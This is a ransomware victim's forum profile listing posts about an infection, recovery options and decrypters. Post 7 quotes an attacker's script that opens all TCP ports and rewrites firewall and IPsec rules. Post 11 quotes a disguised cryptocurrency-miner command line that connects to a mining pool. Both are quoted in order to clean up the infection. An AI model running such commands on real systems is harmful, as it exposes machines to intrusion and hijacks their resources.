ganymede

Member
  • Content Count

    17
  • Joined

  • Last visited

  • Days Won

    2

ganymede last won the day on May 16 2017

ganymede had the most liked content!

Community Reputation

3 Neutral

About ganymede

  • Rank
    Member

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Sounds like some sort of syndicate. Ransomware-as-a-service? Could you explain that a little more? When you say anyone can get their own ransomware, do you mean get the app/whatever that initiates the encryption on other machines?
  2. Never mind, apparently it works in Windows 7 at least. Didn't accept my .onion files as being compatible though. :/
  3. I double click the exe inside and nothing happens. That was disappointing...
  4. People need to understand that this forum is hosted by Emsisoft, a company selling anti-malware tools etc. They cannot endorse anything as a solution to this ransomware other than their software (or perhaps some other application from a digitally verified source), if for no other reason than corporate liability. No offense to anyone here trying to help, but if you want to "go rogue", I suggest starting a thread on Bleeping Computer. Knowledge sharing is always welcome though. Sounds to me like the folks here have done all they can with the info at hand. All we can do now is wait and hope people stop paying the ransom so the criminals get bored or something and leak info.
  5. People are unofficially calling it Cry36, not to be confused with Cry128. You may want to ask Emsisoft folks to see if they have a name for it though.
  6. so you think they blocked port 445 so that our systems wouldn't be infected with wannacry? we must have been the "expeditionary front" of the wannacry plague to test it out before launching it en masse.
  7. @NnitehawkK-fb, thanks for posting that. It's a script that the hacker ran to open up a bunch of vulnerabilities on your machine, so now I know where to look to plug all the holes. For example, go to the command prompt and type `netsh ipsec static show all` and likely there will be a bunch of filters and whatnot listed that you'll want to remove. Another place you'll want to go to remove stuff is in the windows firewall with advanced security snap-in to take out the tcp-all rule et al. here're the commands cleaned up: C:\WINDOWS\system32>ping 127.0.0.1 -n 10 C:\WINDOWS\system32>net1 user IISUSER$ /del & net1 user IUSR_Servs /del C:\WINDOWS\system32>sc config MpsSvc start= auto & net start MpsSvc C:\WINDOWS\system32>netsh advfirewall set allprofiles state on C:\WINDOWS\system32>netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow C:\WINDOWS\system32>netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block C:\WINDOWS\system32>netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow C:\WINDOWS\system32>netsh ipsec static add policy name=win C:\WINDOWS\system32>netsh ipsec static add filterlist name=Allowlist C:\WINDOWS\system32>netsh ipsec static add filterlist name=denylist C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445 C:\WINDOWS\system32>netsh ipsec static add filteraction name=Allow action=permit Something curious -- why would they want to deny inbound port 445? Seems like that would be a precautionary thing.
  8. Most commonly it's been brute force entry via Remote Desktop, though I've been hearing in the news lately that Office 365 and some other feature Windows comes with were also points of entry. I can't remember the name of the other thing off the top of my head but apparently it was a serious enough vulnerability that Microsoft released updates for old OSes as far back as XP.
  9. Ahh this was the company I reached out to as well. They quoted me ~$1900 for 5-7 day service. I opted not to pursue in the hopes that Emsi will come out with something in the near future, but if I need the data sooner, it's good to know now that they're a sure thing. Thanks for the info.
  10. Just an opinion here, but the folks at Emsisoft are doing what they can to provide a FREE service to restore peoples' files, and for that no one has any reasonable ground on which to complain. I too have wondered as to their status, but with updates like Sarah's, I know that it's not being ignored. How much could they possibly share on a topic that most would likely not understand? For my own situation, I have reached out to a specialist recovery service, and they claim to be able to restore my files for ~2000$, but I am waiting for the folks at Emsisoft because I'm confident they'll come up with something in a reasonable amount of time. And also because no matter the cost to my company, I refuse to negotiate with terrorists. Meanwhile I have been redoing lost work as needed. All in all, still probably less cost than the $2k being quoted. If Fabian and the rest of Emsisoft's brain trust can fix this, you better believe I'm buying their product!
  11. I think this guy might have the actual executable. On a different note, I'm not sure why but I forgot to mention in my original post that I found the service registry of the virus in my Windows logs: winlogon.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 48Nk7Q5oB5gEVLabrgo3KhLbaTSDKvZNHBECoHyZcxWNDMgfDnHA8Ue2Skp7A6z2ZGG93wmLxxrKa1j4QR7kmi866AP1G8t -p x Workstationt C:\Windows Maybe that long nonsense string has something to do with the key?
  12. George, I'm not sure those bytes are meant to be constant. My last 4 in each file are 35 F6 5C 01. Also to Kenneth and mclaugb, you may have different variants than the one being discussed here, as your extensions end in .onion._. Those were linked to Cry128. Have you tried using the decrypter for it?
  13. Confirmed. Also, and this is probably a "duh, obviously" thing to mention, but check your Windows firewall with advanced security, inbound rules. I was in there whitelisting my RDP ports and noticed that the *&^%$! opened up all ports for tcp connections.
  14. yeah I noticed that some of my picture files (jpg & png) were renamed yet unencrypted too. I wasn't sure if it had to do with the extension or if maybe the virus renamed everything first and then went to encrypting. I would love to try renaming my files back en masse, but I literally have millions of files and I don't want to rename the ones that are actually encrypted because the decrypter won't recognize them then.